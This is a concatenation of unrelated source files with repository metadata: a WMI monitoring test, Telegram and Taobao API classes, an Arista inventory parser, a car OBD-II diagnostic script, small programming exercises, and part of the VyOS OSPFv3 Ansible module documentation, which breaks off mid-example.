c84e38b4c188ec5aeffcefc56fcd15de3ff96624 | 9b1e925d953e29d18451b0bcc0cf2da853d8a29f | /testing/test_wmic.py | 71ef426d6ace68ee24105facbcf4c9bbffc30496 | [] | no_license | safl/levis | a61eeb72e620a924ed185d03988ad5ce5c39654b | e6f007f7f74e92c82da16c5645b3f41eb16c77cb | refs/heads/master | 2016-09-06T16:47:43.456935 | 2011-03-07T20:22:19 | 2011-03-07T20:22:19 | 1,360,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,256 | py | #!/usr/bin/env python
import unittest, os
import rpc
class TestKeyParsing(unittest.TestCase):
def setUp(self):
self.wmi_target = {
"host": "192.168.1.101",
"domain": "",
"user": "safl",
"pass": "bufasbufas"
}
self.queries = {
'filesize': "SELECT Name, FileSize FROM CIM_DataFile WHERE Name = 'c:\\\\hej.pst'",
'exefiles': "SELECT Name, FileSize FROM CIM_DataFile WHERE Extension = 'exe'",
'service_enum': "SELECT * FROM Win32_Service",
'service_state': "SELECT Name, State FROM Win32_Service WHERE Name = 'SysmonLog'",
'disk_enum': "SELECT * FROM Win32_LogicalDisk",
'disks': "SELECT * FROM Win32_DiskDrive",
'disk_free': "SELECT Name, DeviceID, FreeSpace FROM Win32_LogicalDisk WHERE DeviceID = 'C:'",
'cpu_enum': "SELECT * FROM Win32_Processor",
'cpu_util': "SELECT Name, DeviceID, LoadPercentage FROM Win32_Processor WHERE DeviceID = 'CPU0'",
'cpu_avg': "SELECT Name, LoadPercentage FROM Win32_Processor",
'os_enum': "SELECT * FROM Win32_OperatingSystem",
'tapedrive': "SELECT * FROM Win32_TapeDrive",
'os_uptime': "SELECT LastBootUpTime FROM Win32_OperatingSystem",
'os_mem_free_phys': "SELECT FreePhysicalMemory FROM Win32_OperatingSystem",
'os_mem_free_virt': "SELECT FreeVirtualMemory FROM Win32_OperatingSystem",
'bios': "SELECT * FROM Win32_Bios",
'perf_enum': "SELECT * FROM Win32_PerfRawData_PerfOS_System",
'perf': "SELECT * FROM Win32_PerfFormattedData",
'eventlog_enum': "SELECT CategoryString, EventCode, EventType, Logfile, SourceName, TimeGenerated, TimeWritten FROM Win32_NTLogEvent WHERE TimeWritten > '20100323193917.000000+060'",
'eventlog_describe': "SELECT * FROM Win32_NTLogEvent"
}
def test_connect_and_query(self):
(out, ret) = wmic.query(self.wmi_target, self.queries['os_enum'])
print out, ret
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
2ceb8b6e1ccafafc87279f7ec6943a194f4efdb5 | 40606a0f9bcbe851fcfa3b6bce0f090c267656fe | /models/subnets/__init__.py | 21ebd52d4362421987fce59d36fdd4254dc45f88 | [
"Apache-2.0"
] | permissive | ryanwongsa/open-images-2019-challenge | d15f0aa4042c5622f56e268539c5ba20321d3563 | b49e0933451c4bf9b31a9a8faf1bd8ba3dee1cc5 | refs/heads/master | 2020-06-26T19:23:45.432268 | 2019-10-07T19:20:40 | 2019-10-07T19:20:40 | 199,730,058 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 103 | py | from .regression_subnet import RegressionSubnet
from .classification_subnet import ClassificationSubnet | [
"[email protected]"
] | |
3bf22289b93db09ad9e3ef68a0b53fb48f6a960e | 028d788c0fa48a8cb0cc6990a471e8cd46f6ec50 | /Python-OOP/Exam/project/fish/base_fish.py | 56973ffd676945dedddedc868c3419b8b1d3ed8c | [] | no_license | Sheko1/SoftUni | d6b8e79ae545116f4c0e5705ad842f12d77a9c9d | a9fbeec13a30231b6a97c2b22bb35257ac1481c0 | refs/heads/main | 2023-07-13T15:39:48.826925 | 2021-08-21T12:51:02 | 2021-08-21T12:51:02 | 317,266,200 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,055 | py | from abc import ABC, abstractmethod
class BaseFish(ABC):
size_to_increase = 5
def __init__(self, name: str, species: str, size: int, price: float):
self.name = name
self.species = species
self.size = size
self.price = price
@property
def name(self):
return self.__name
@name.setter
def name(self, value):
if not value:
raise ValueError("Fish name cannot be an empty string.")
self.__name = value
@property
def species(self):
return self.__species
@species.setter
def species(self, value):
if not value:
raise ValueError("Fish species cannot be an empty string.")
self.__species = value
@property
def price(self):
return self.__price
@price.setter
def price(self, value):
if value <= 0:
raise ValueError("Price cannot be equal to or below zero.")
self.__price = value
@abstractmethod
def eat(self):
self.size += self.size_to_increase
| [
"[email protected]"
] | |
49c315b88481e4a6d78a623438fcbeda3f56a89d | e2e8d2462bcd97fe94b959e8d541f9856b136357 | /ENV/lib/python3.5/site-packages/pyrogram/api/functions/messages/get_game_high_scores.py | dbe17ff41a0be895d46d862131acaeb138dd7eb8 | [
"MIT"
] | permissive | wasweisic/CryptoPredicted | a8babd459ab1da634014830be77615356d0200f7 | 7f660cdc456fb8252b3125028f31fd6f5a3ceea5 | refs/heads/master | 2023-04-12T12:34:29.317983 | 2021-02-01T13:07:18 | 2021-02-01T13:07:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,368 | py | # Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2018 Dan Tès <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.api.core import *
class GetGameHighScores(Object):
"""Attributes:
ID: ``0xe822649d``
Args:
peer: Either :obj:`InputPeerEmpty <pyrogram.api.types.InputPeerEmpty>`, :obj:`InputPeerSelf <pyrogram.api.types.InputPeerSelf>`, :obj:`InputPeerChat <pyrogram.api.types.InputPeerChat>`, :obj:`InputPeerUser <pyrogram.api.types.InputPeerUser>` or :obj:`InputPeerChannel <pyrogram.api.types.InputPeerChannel>`
id: ``int`` ``32-bit``
user_id: Either :obj:`InputUserEmpty <pyrogram.api.types.InputUserEmpty>`, :obj:`InputUserSelf <pyrogram.api.types.InputUserSelf>` or :obj:`InputUser <pyrogram.api.types.InputUser>`
Raises:
:obj:`Error <pyrogram.Error>`
Returns:
:obj:`messages.HighScores <pyrogram.api.types.messages.HighScores>`
"""
ID = 0xe822649d
def __init__(self, peer, id: int, user_id):
self.peer = peer # InputPeer
self.id = id # int
self.user_id = user_id # InputUser
@staticmethod
def read(b: BytesIO, *args) -> "GetGameHighScores":
# No flags
peer = Object.read(b)
id = Int.read(b)
user_id = Object.read(b)
return GetGameHighScores(peer, id, user_id)
def write(self) -> bytes:
b = BytesIO()
b.write(Int(self.ID, False))
# No flags
b.write(self.peer.write())
b.write(Int(self.id))
b.write(self.user_id.write())
return b.getvalue()
| [
"[email protected]"
] | |
9fb483bd59a64a4079e937ff1466937a02383c7e | 48894ae68f0234e263d325470178d67ab313c73e | /sa/profiles/Arista/EOS/get_inventory.py | b981153e1be44768007d5d21e68c85dc6a016ed1 | [
"BSD-3-Clause"
] | permissive | DreamerDDL/noc | 7f949f55bb2c02c15ac2cc46bc62d957aee43a86 | 2ab0ab7718bb7116da2c3953efd466757e11d9ce | refs/heads/master | 2021-05-10T18:22:53.678588 | 2015-06-29T12:28:20 | 2015-06-29T12:28:20 | 118,628,133 | 0 | 0 | null | 2018-01-23T15:19:51 | 2018-01-23T15:19:51 | null | UTF-8 | Python | false | false | 3,559 | py | # -*- coding: utf-8 -*-
##----------------------------------------------------------------------
## Arista.EOS.get_inventory
##----------------------------------------------------------------------
## Copyright (C) 2007-2013 The NOC Project
## See LICENSE for details
##----------------------------------------------------------------------
## Python modules
import re
## NOC modules
from noc.sa.script import Script as NOCScript
from noc.sa.interfaces.igetinventory import IGetInventory
from noc.lib.text import parse_table
class Script(NOCScript):
name = "Arista.EOS.get_inventory"
cache = True
implements = [IGetInventory]
rx_section = re.compile("System has (\d+) (.+?)$", re.MULTILINE)
def execute(self):
objects = []
v = self.cli("show inventory")
sections = self.rx_section.split(v)
objects += self.parse_chassis(sections.pop(0))
while sections:
cnt, type, data = sections[:3]
sections = sections[3:]
t = type.lower()
if t.startswith("power supply"):
objects += self.parse_psu(data)
elif t.startswith("fan"):
objects += self.parse_fan(data)
elif t.startswith("transceiver"):
objects += self.parse_transceiver(data)
return objects
@classmethod
def parse_chassis(cls, data):
objects = []
parts = data.split("\n\n")
# Chassis section
_, ctable = parts[0].split("\n", 1)
n = 0
for part_no, description in parse_table(ctable):
objects += [{
"type": "CHASSIS",
"number": str(n),
"vendor": "ARISTA",
"serial": None,
"description": description,
"part_no": part_no,
"revision": None,
"builtin": False
}]
n += 1
# Serial/revision section
n = 0
for rev, serial, mfg_data in parse_table(parts[1]):
objects[n]["revision"] = rev
objects[n]["serial"] = serial
n += 1
return objects
@classmethod
def parse_psu(cls, data):
objects = []
for slot, part_no, serial in parse_table(data.strip()):
objects += [{
"type": "PWR",
"number": slot,
"vendor": "ARISTA",
"serial": serial,
"part_no": part_no,
"builtin": False
}]
return objects
@classmethod
def parse_fan(cls, data):
objects = []
for slot, nfans, part_no, serial in parse_table(data.strip()):
objects += [{
"type": "FAN",
"number": slot,
"vendor": "ARISTA",
"serial": serial,
"part_no": part_no,
"builtin": False
}]
return objects
@classmethod
def parse_transceiver(cls, data):
objects = []
for port, vendor, part_no, serial, rev in parse_table(data.strip()):
vendor = vendor.upper()
if vendor == "NOT PRESENT":
continue
if vendor == "ARISTA NETWORKS":
vendor = "ARISTA"
objects += [{
"type": "XCVR",
"number": port,
"vendor": vendor,
"serial": serial,
"part_no": part_no,
"builtin": False
}]
return objects
| [
"[email protected]"
] | |
46b93892928e8b45940441867657548a521a2644 | 364020e5cb0f057f4e63b8e0c43a03c565bb249d | /panda/examples/query_vin_and_stats.py | f3d6c198aff9f1485743a904d083deab4cee5fb4 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | Gernby/openpilot | fb7c9e607be438334aaf48e338de7f07343a7873 | d8da18ed546637a8d6a00d2b4c9dfafb90d2a4dd | refs/heads/devel | 2020-04-05T02:04:56.217699 | 2019-07-01T21:15:34 | 2019-07-01T21:15:34 | 156,462,811 | 38 | 75 | MIT | 2020-04-25T21:01:31 | 2018-11-06T23:34:08 | C++ | UTF-8 | Python | false | false | 1,723 | py | #!/usr/bin/env python
import time
import struct
from panda import Panda
from hexdump import hexdump
from panda.python.isotp import isotp_send, isotp_recv
# 0x7e0 = Toyota
# 0x18DB33F1 for Honda?
def get_current_data_for_pid(pid):
# 01 xx = Show current data
isotp_send(panda, "\x01"+chr(pid), 0x7e0)
return isotp_recv(panda, 0x7e8)
def get_supported_pids():
ret = []
pid = 0
while 1:
supported = struct.unpack(">I", get_current_data_for_pid(pid)[2:])[0]
for i in range(1+pid, 0x21+pid):
if supported & 0x80000000:
ret.append(i)
supported <<= 1
pid += 0x20
if pid not in ret:
break
return ret
if __name__ == "__main__":
panda = Panda()
panda.set_safety_mode(Panda.SAFETY_ELM327)
panda.can_clear(0)
# 09 02 = Get VIN
isotp_send(panda, "\x09\x02", 0x7df)
ret = isotp_recv(panda, 0x7e8)
hexdump(ret)
print "VIN: %s" % ret[2:]
# 03 = get DTCS
isotp_send(panda, "\x03", 0x7e0)
dtcs = isotp_recv(panda, 0x7e8)
print "DTCs:", dtcs[2:].encode("hex")
supported_pids = get_supported_pids()
print "Supported PIDs:",supported_pids
while 1:
speed = struct.unpack(">B", get_current_data_for_pid(13)[2:])[0] # kph
rpm = struct.unpack(">H", get_current_data_for_pid(12)[2:])[0]/4.0 # revs
throttle = struct.unpack(">B", get_current_data_for_pid(17)[2:])[0]/255.0 * 100 # percent
temp = struct.unpack(">B", get_current_data_for_pid(5)[2:])[0] - 40 # degrees C
load = struct.unpack(">B", get_current_data_for_pid(4)[2:])[0]/255.0 * 100 # percent
print "%d KPH, %d RPM, %.1f%% Throttle, %d deg C, %.1f%% load" % (speed, rpm, throttle, temp, load)
time.sleep(0.2)
| [
"[email protected]"
] | |
3b3efdfad9fac7e5373bbc3882ccc7ed1d90ec0f | afc87a0ecde9869df0802d6ad79d18d9722727d8 | /oregon/home/templatetags/home_d3tags.py | c524d18698e81791c61541dc6872a722ddcb0dd8 | [] | no_license | hobson/oregon | cc005e5fb158142cb0879db1bae73b040815cc3a | 4cd3cc8696db25f531839dbda4c903357df27e58 | refs/heads/master | 2021-01-19T03:23:29.595855 | 2013-10-01T05:57:40 | 2013-10-01T05:57:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 497 | py | from django.core.serializers import serialize
from django.core.serializers.json import DjangoJSONEncoder
from django.db.models.query import QuerySet
from django.template import Library
from django.utils import simplejson
register = Library()
#@register.filter(name='jsonify')
def jsonify(object):
if isinstance(object, QuerySet):
return serialize('json', object)
return simplejson.dumps(object, cls=DjangoJSONEncoder)
jsonify.is_safe=True
register.filter('jsonify', jsonify)
| [
"[email protected]"
] | |
6856c56c7c43315dc8a2657bc9746e449d89c043 | 56fdddd67821db9bb21dc2f851a1ae3b22256429 | /s1level41.py | 0c008ae52c1c1f555652671295617d095ad07e47 | [
"Unlicense"
] | permissive | gemeraldsfilms/code-org-python | 359276751a08d6a66ca5199dbdd1004c5d4eccd1 | bd6e0871de3e23d3e94212caf94d57997b504134 | refs/heads/master | 2021-01-14T11:25:58.986699 | 2014-10-31T18:21:33 | 2014-10-31T18:21:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | import codestudio
artist = codestudio.load('s1level41')
for count in range(10):
artist.pen.color = 'random'
for count in range(4):
artist.move_forward(20)
artist.turn_right(90)
artist.move_forward(20)
artist.check()
| [
"[email protected]"
] | |
1023ebd93d98f3012ed40bb1e458b458c8d3cddf | 875a711df288d33778e2ae876f8f67490c91a7a1 | /PathMangerExamples.py | f64b79ab66d397fdd0efb3a13b2f0faacbcb5338 | [] | no_license | zethwillie/chrlx_pipe | 4c45bd51591a6dbdbe848da348ae3835569397d7 | 7c69818c125fc01a07a7294bd8d34d28a61f04bc | refs/heads/master | 2021-01-22T21:17:56.259480 | 2017-08-18T04:28:11 | 2017-08-18T04:28:11 | 100,672,617 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,630 | py | from chrlx.utils import PathManager
path = PathManager("G:\jobs\charlex_testArea_T60173\W_psultan\scenes\shot010\lgt\workshop\T60173W_010_std_software.01.ma")
#job info determined by folder structure
print "jobNumber:", path.jobNumber
print "jobDirname:", path.jobDirname
print "jobShortname:", path.jobShortname
print "jobType:", path.jobType
print "jobPath:", path.jobPath
print "spotLetter:", path.spotLetter
print "spotDirname:", path.spotDirname
print "spotFullname:", path.spotFullname
print "spotShortname:", path.spotShortname
print "spotSchema:", path.spotSchema
print "spotPath:", path.spotPath
print "projectPath:", path.projectPath
print "configPath:", path.configPath
print "assetPath:", path.assetPath
print "charPath:", path.charPath
print "propPath:", path.propPath
print "shot:", path.shot
print "shotName:", path.shotName
print "shotType:", path.shotType
print "shotFullname:", path.shotFullname
print "shotShortname:", path.shotShortname
print "shotStage:", path.shotStage
print "scenePath:", path.scenePath
print "compPath:", path.compPath
print "anmPath:", path.anmPath
print "lgtPath:", path.lgtPath
print "jobId", path.job.id #many attributes are accessible with dot notation
#folder navigation
print "scenePath", path.scenePath
print "compPath", path.compPath
print "framesPath", path.framesPath
#job info determined by db
print "start_date", path.job.start_date
print "status", path.spot.status
#lgt shot specific functions
print "variants", path.getVariants()
print "masters", path.getMasters()
print "mastername", path.getMasterName()
print "version", path.getVersion()
| [
"[email protected]"
] | |
1d0101942a1f8158b1df89d28a581f8a989d6099 | a7cca49626a3d7100e9ac5c2f343c351ecb76ac7 | /tests/dev_tests/get_machine_freq.py | 53f58efc5548afd9221dc39ed26ccc27e86361d3 | [
"MIT"
] | permissive | Carglglz/upydev | 104455d77d64300074bda54d86bd791f19184975 | 529aa29f3e1acf8160383fe410b5659110dc96de | refs/heads/master | 2023-05-24T18:38:56.242500 | 2022-10-21T14:03:17 | 2022-10-21T14:03:17 | 199,335,165 | 49 | 9 | MIT | 2022-10-21T14:03:18 | 2019-07-28T20:42:00 | Python | UTF-8 | Python | false | false | 137 | py | import machine
def freq():
fq = machine.freq()
if isinstance(fq, tuple):
return int(fq[0]/1e6)
return int(fq/1e6)
| [
"[email protected]"
] | |
bc5354942ec4f909d4ccdf9434a01480c07a0da5 | 86cc17a69213569af670faed7ad531cb599b960d | /player12.py | 9f6d8ddf708fb3e1cbee2e05883e552d33187881 | [] | no_license | LakshmikanthRavi/guvi-lux | ed1c389e27a9ec62e0fd75c140322563f68d311a | 5c29f73903aa9adb6484c76103edf18ac165259e | refs/heads/master | 2020-04-15T05:07:19.743874 | 2019-08-13T08:53:00 | 2019-08-13T08:53:00 | 164,409,489 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | u,m=map(int,input().split())
g=list(map(int,input().split()))
r=[]
for i in range(u-m,u):
r.append(g[i])
for i in g:
if i not in r:
r.append(i)
print(*r)
| [
"[email protected]"
] | |
e02eccd31bb9c7d6aaa7d19529cafad2e12d8805 | 672ea11a7dee763fc8c37bc82bb609b8de19344c | /src/生成斗地主扑克牌.py | 28fff2f03a30318453efc6cfebefc64fa9a69cbd | [] | no_license | qlong8807/python3-lesson | 294ede6a0de1d89f513209b00504e8f0c9bb2607 | ac4e745a8e8d0ab665e2ff676ddcd0ab190fed06 | refs/heads/master | 2020-04-08T15:18:44.564272 | 2020-02-18T08:33:30 | 2020-02-18T08:33:30 | 159,472,820 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | # coding:utf8
# author:jans
# desc: 扑克牌洗牌
import random
poker_num = [str(i) for i in range(2,11)]
poker_str = ['A','J','Q','K']
poker_king = ['大王','小王']
poker_color = ['红','黑','方','花']
pokers = ['%s%s' %(i,j) for i in poker_color for j in poker_num+poker_str] + poker_king
print(len(pokers))
print(pokers)
print('开始洗牌')
random.shuffle(pokers)
print('洗牌中。。。')
print(pokers)
#斗地主发牌
person_a = pokers[0:51:3]
person_b = pokers[1:51:3]
person_c = pokers[2:51:3]
last_3 = pokers[-3:]
print('第一个人的牌:',person_a)
print('第二个人的牌:',person_b)
print('第三个人的牌:',person_c)
print('底牌:',last_3) | [
"[email protected]"
] | |
4ab465fcdde84101246798cce491652b00295dce | 63cf686bf970d28c045719de2f0e7e9dae5bed15 | /N-th Tribonacci Number.py | 13e5231116e6aba79408a56a4f23a7c77a01f1bf | [] | no_license | menard-noe/LeetCode | 6461bda4a076849cf69f2cd87999275f141cc483 | 4e9c50d256c84d1b830a7642b265619a0b69d542 | refs/heads/master | 2022-12-13T09:41:41.682555 | 2020-09-14T12:46:53 | 2020-09-14T12:46:53 | 282,481,920 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 493 | py | from typing import List
class Solution:
def __init__(self):
self.memo = {0: 0, 1: 1, 2: 1}
def tribonacci(self, n: int) -> int:
if n in self.memo:
return self.memo[n]
else:
self.memo[n] = self.tribonacci(n - 1) + self.tribonacci(n - 2) + self.tribonacci(n - 3)
return self.memo[n]
if __name__ == "__main__":
# execute only if run as a script
n = 25
solution = Solution()
print(solution.tribonacci(n))
| [
"[email protected]"
] | |
d37e9764102913288d0e90d9ba66699201662d2d | 3b2940c38412e5216527e35093396470060cca2f | /top/api/rest/LogisticsOrderShengxianConfirmRequest.py | 3a40c08aaf7002f5809c5f42c433f502317e3311 | [] | no_license | akingthink/goods | 842eb09daddc2611868b01ebd6e330e5dd7d50be | ffdb5868a8df5c2935fc6142edcdf4c661c84dca | refs/heads/master | 2021-01-10T14:22:54.061570 | 2016-03-04T09:48:24 | 2016-03-04T09:48:24 | 45,093,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 516 | py | '''
Created by auto_sdk on 2015-01-20 12:44:31
'''
from top.api.base import RestApi
class LogisticsOrderShengxianConfirmRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.cancel_id = None
self.delivery_type = None
self.logis_id = None
self.out_sid = None
self.seller_ip = None
self.sender_id = None
self.service_code = None
self.tid = None
def getapiname(self):
return 'taobao.logistics.order.shengxian.confirm'
| [
"[email protected]"
] | |
f4e4d6b578a9c7190f7a40207d6430cb833bbfc4 | 64bf39b96a014b5d3f69b3311430185c64a7ff0e | /intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/vyos/vyos/plugins/modules/vyos_ospfv3.py | ca5bc93c40b037794dbda36f2d1e71f79b91fbb5 | [
"MIT",
"GPL-3.0-or-later",
"LicenseRef-scancode-unknown-license-reference",
"GPL-3.0-only"
] | permissive | SimonFangCisco/dne-dna-code | 7072eba7da0389e37507b7a2aa5f7d0c0735a220 | 2ea7d4f00212f502bc684ac257371ada73da1ca9 | refs/heads/master | 2023-03-10T23:10:31.392558 | 2021-02-25T15:04:36 | 2021-02-25T15:04:36 | 342,274,373 | 0 | 0 | MIT | 2021-02-25T14:39:22 | 2021-02-25T14:39:22 | null | UTF-8 | Python | false | false | 18,590 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2019 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#############################################
# WARNING #
#############################################
#
# This file is auto generated by the resource
# module builder playbook.
#
# Do not edit this file manually.
#
# Changes to this file will be over written
# by the resource module builder.
#
# Changes should be made in the model used to
# generate this file or in the resource module
# builder template.
#
#############################################
"""
The module file for vyos_ospfv3
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
module: vyos_ospfv3
short_description: OSPFV3 resource module
description: This resource module configures and manages attributes of OSPFv3 routes
on VyOS network devices.
version_added: 1.0.0
notes:
- Tested against VyOS 1.1.8 (helium).
- This module works with connection C(network_cli). See L(the VyOS OS Platform Options,../network/user_guide/platform_vyos.html).
author:
- Rohit Thakur (@rohitthakur2590)
options:
config:
description: A provided OSPFv3 route configuration.
type: dict
suboptions:
areas:
description: OSPFv3 area.
type: list
elements: dict
suboptions:
area_id:
description: OSPFv3 Area name/identity.
type: str
export_list:
description: Name of export-list.
type: str
import_list:
description: Name of import-list.
type: str
range:
description: Summarize routes matching prefix (border routers only).
type: list
elements: dict
suboptions:
address:
description: border router IPv4 address.
type: str
advertise:
description: Advertise this range.
type: bool
not_advertise:
description: Don't advertise this range.
type: bool
parameters:
description: OSPFv3 specific parameters.
type: dict
suboptions:
router_id:
description: Override the default router identifier.
type: str
redistribute:
description: Redistribute information from another routing protocol.
type: list
elements: dict
suboptions:
route_type:
description: Route type to redistribute.
type: str
choices: [bgp, connected, kernel, ripng, static]
route_map:
description: Route map references.
type: str
running_config:
description:
- This option is used only with state I(parsed).
- The value of this option should be the output received from the VyOS device
by executing the command B(show configuration commands | grep ospfv3).
- The state I(parsed) reads the configuration from C(running_config) option and
transforms it into Ansible structured data as per the resource module's argspec
and the value is then returned in the I(parsed) key within the result.
type: str
state:
description:
- The state the configuration should be left in.
type: str
choices:
- merged
- replaced
- deleted
- parsed
- gathered
- rendered
default: merged
"""
EXAMPLES = """
# Using merged
#
# Before state:
# -------------
#
# vyos@vyos# run show configuration commands | grep ospfv3
#
#
- name: Merge the provided configuration with the exisiting running configuration
vyos.vyos.vyos_ospfv3:
config:
redistribute:
- route_type: bgp
parameters:
router_id: 192.0.2.10
areas:
- area_id: '2'
export_list: export1
import_list: import1
range:
- address: 2001:db10::/32
- address: 2001:db20::/32
- address: 2001:db30::/32
- area_id: '3'
range:
- address: 2001:db40::/32
state: merged
#
#
# -------------------------
# Module Execution Result
# -------------------------
#
# before": {}
#
# "commands": [
# "set protocols ospfv3 redistribute bgp",
# "set protocols ospfv3 parameters router-id '192.0.2.10'",
# "set protocols ospfv3 area 2 range 2001:db10::/32",
# "set protocols ospfv3 area 2 range 2001:db20::/32",
# "set protocols ospfv3 area 2 range 2001:db30::/32",
# "set protocols ospfv3 area '2'",
# "set protocols ospfv3 area 2 export-list export1",
# "set protocols ospfv3 area 2 import-list import1",
# "set protocols ospfv3 area '3'",
# "set protocols ospfv3 area 3 range 2001:db40::/32"
# ]
#
# "after": {
# "areas": [
# {
# "area_id": "2",
# "export_list": "export1",
# "import_list": "import1",
# "range": [
# {
# "address": "2001:db10::/32"
# },
# {
# "address": "2001:db20::/32"
# },
# {
# "address": "2001:db30::/32"
# }
# ]
# },
# {
# "area_id": "3",
# "range": [
# {
# "address": "2001:db40::/32"
# }
# ]
# }
# ],
# "parameters": {
# "router_id": "192.0.2.10"
# },
# "redistribute": [
# {
# "route_type": "bgp"
# }
# ]
# }
#
# After state:
# -------------
#
# vyos@192# run show configuration commands | grep ospfv3
# set protocols ospfv3 area 2 export-list 'export1'
# set protocols ospfv3 area 2 import-list 'import1'
# set protocols ospfv3 area 2 range '2001:db10::/32'
# set protocols ospfv3 area 2 range '2001:db20::/32'
# set protocols ospfv3 area 2 range '2001:db30::/32'
# set protocols ospfv3 area 3 range '2001:db40::/32'
# set protocols ospfv3 parameters router-id '192.0.2.10'
# set protocols ospfv3 redistribute 'bgp'
# Using replaced
#
# Before state:
# -------------
#
# vyos@192# run show configuration commands | grep ospfv3
# set protocols ospfv3 area 2 export-list 'export1'
# set protocols ospfv3 area 2 import-list 'import1'
# set protocols ospfv3 area 2 range '2001:db10::/32'
# set protocols ospfv3 area 2 range '2001:db20::/32'
# set protocols ospfv3 area 2 range '2001:db30::/32'
# set protocols ospfv3 area 3 range '2001:db40::/32'
# set protocols ospfv3 parameters router-id '192.0.2.10'
# set protocols ospfv3 redistribute 'bgp'
#
- name: Replace ospfv3 routes attributes configuration.
vyos.vyos.vyos_ospfv3:
config:
redistribute:
- route_type: bgp
parameters:
router_id: 192.0.2.10
areas:
- area_id: '2'
export_list: export1
import_list: import1
range:
- address: 2001:db10::/32
- address: 2001:db30::/32
- address: 2001:db50::/32
- area_id: '4'
range:
- address: 2001:db60::/32
state: replaced
#
#
# -------------------------
# Module Execution Result
# -------------------------
#
# "before": {
# "areas": [
# {
# "area_id": "2",
# "export_list": "export1",
# "import_list": "import1",
# "range": [
# {
# "address": "2001:db10::/32"
# },
# {
# "address": "2001:db20::/32"
# },
# {
# "address": "2001:db30::/32"
# }
# ]
# },
# {
# "area_id": "3",
# "range": [
# {
# "address": "2001:db40::/32"
# }
# ]
# }
# ],
# "parameters": {
# "router_id": "192.0.2.10"
# },
# "redistribute": [
# {
# "route_type": "bgp"
# }
# ]
# }
#
# "commands": [
# "delete protocols ospfv3 area 2 range 2001:db20::/32",
# "delete protocols ospfv3 area 3",
# "set protocols ospfv3 area 2 range 2001:db50::/32",
# "set protocols ospfv3 area '4'",
# "set protocols ospfv3 area 4 range 2001:db60::/32"
# ]
#
# "after": {
# "areas": [
# {
# "area_id": "2",
# "export_list": "export1",
# "import_list": "import1",
# "range": [
# {
# "address": "2001:db10::/32"
# },
# {
# "address": "2001:db30::/32"
# },
# {
# "address": "2001:db50::/32"
# }
# ]
# },
# {
# "area_id": "4",
# "range": [
# {
# "address": "2001:db60::/32"
# }
# ]
# }
# ],
# "parameters": {
# "router_id": "192.0.2.10"
# },
# "redistribute": [
# {
# "route_type": "bgp"
# }
# ]
# }
#
# After state:
# -------------
#
# vyos@192# run show configuration commands | grep ospfv3
# set protocols ospfv3 area 2 export-list 'export1'
# set protocols ospfv3 area 2 import-list 'import1'
# set protocols ospfv3 area 2 range '2001:db10::/32'
# set protocols ospfv3 area 2 range '2001:db30::/32'
# set protocols ospfv3 area 2 range '2001:db50::/32'
# set protocols ospfv3 area 4 range '2001:db60::/32'
# set protocols ospfv3 parameters router-id '192.0.2.10'
# set protocols ospfv3 redistribute 'bgp'
# Using rendered
#
#
- name: Render the commands for provided configuration
vyos.vyos.vyos_ospfv3:
config:
redistribute:
- route_type: bgp
parameters:
router_id: 192.0.2.10
areas:
- area_id: '2'
export_list: export1
import_list: import1
range:
- address: 2001:db10::/32
- address: 2001:db20::/32
- address: 2001:db30::/32
- area_id: '3'
range:
- address: 2001:db40::/32
state: rendered
#
#
# -------------------------
# Module Execution Result
# -------------------------
#
#
# "rendered": [
# [
# "set protocols ospfv3 redistribute bgp",
# "set protocols ospfv3 parameters router-id '192.0.2.10'",
# "set protocols ospfv3 area 2 range 2001:db10::/32",
# "set protocols ospfv3 area 2 range 2001:db20::/32",
# "set protocols ospfv3 area 2 range 2001:db30::/32",
# "set protocols ospfv3 area '2'",
# "set protocols ospfv3 area 2 export-list export1",
# "set protocols ospfv3 area 2 import-list import1",
# "set protocols ospfv3 area '3'",
# "set protocols ospfv3 area 3 range 2001:db40::/32"
# ]
# Using parsed
#
#
- name: Parse the commands to provide structured configuration.
vyos.vyos.vyos_ospfv3:
running_config:
"set protocols ospfv3 area 2 export-list 'export1'
set protocols ospfv3 area 2 import-list 'import1'
set protocols ospfv3 area 2 range '2001:db10::/32'
set protocols ospfv3 area 2 range '2001:db20::/32'
set protocols ospfv3 area 2 range '2001:db30::/32'
set protocols ospfv3 area 3 range '2001:db40::/32'
set protocols ospfv3 parameters router-id '192.0.2.10'
set protocols ospfv3 redistribute 'bgp'"
state: parsed
#
#
# -------------------------
# Module Execution Result
# -------------------------
#
#
# "parsed": {
# "areas": [
# {
# "area_id": "2",
# "export_list": "export1",
# "import_list": "import1",
# "range": [
# {
# "address": "2001:db10::/32"
# },
# {
# "address": "2001:db20::/32"
# },
# {
# "address": "2001:db30::/32"
# }
# ]
# },
# {
# "area_id": "3",
# "range": [
# {
# "address": "2001:db40::/32"
# }
# ]
# }
# ],
